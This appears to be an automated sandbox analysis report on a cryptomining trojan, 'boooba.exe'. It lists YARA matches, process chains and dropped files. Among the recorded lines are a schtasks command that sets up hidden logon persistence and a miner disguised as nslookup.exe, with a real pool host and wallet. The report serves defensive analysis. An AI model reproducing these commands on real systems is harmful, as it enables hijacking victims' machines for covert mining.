              Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@26/5@1/1
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\IOAshdohSha.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
              Source: boooba.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
              Source: C:\Windows\System32\conhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\boooba.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: boooba.exeReversingLabs: Detection: 71%
              Source: nslookup.exeString found in binary or memory: id-cmc-addExtensions
              Source: nslookup.exeString found in binary or memory: set-addPolicy
              Source: nslookup.exeString found in binary or memory: id-cmc-addExtensions
              Source: nslookup.exeString found in binary or memory: set-addPolicy
              Source: unknownProcess created: C:\Users\user\Desktop\boooba.exe "C:\Users\user\Desktop\boooba.exe"
              Source: C:\Users\user\Desktop\boooba.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
              Source: unknownProcess created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
              Source: C:\Users\user\IOAshdohSha.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              Source: C:\Users\user\IOAshdohSha.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
              Source: C:\Users\user\Desktop\boooba.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Users\user\IOAshdohSha.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exeJump to behavior
              Source: C:\Users\user\IOAshdohSha.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Users\user\Desktop\boooba.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\IOAshdohSha.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\nslookup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: boooba.exeStatic file information: File size 2234368 > 1048576
              Source: boooba.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\IOAshdohSha.exeJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\IOAshdohSha.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\IOAshdohSha.exeJump to dropped file
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
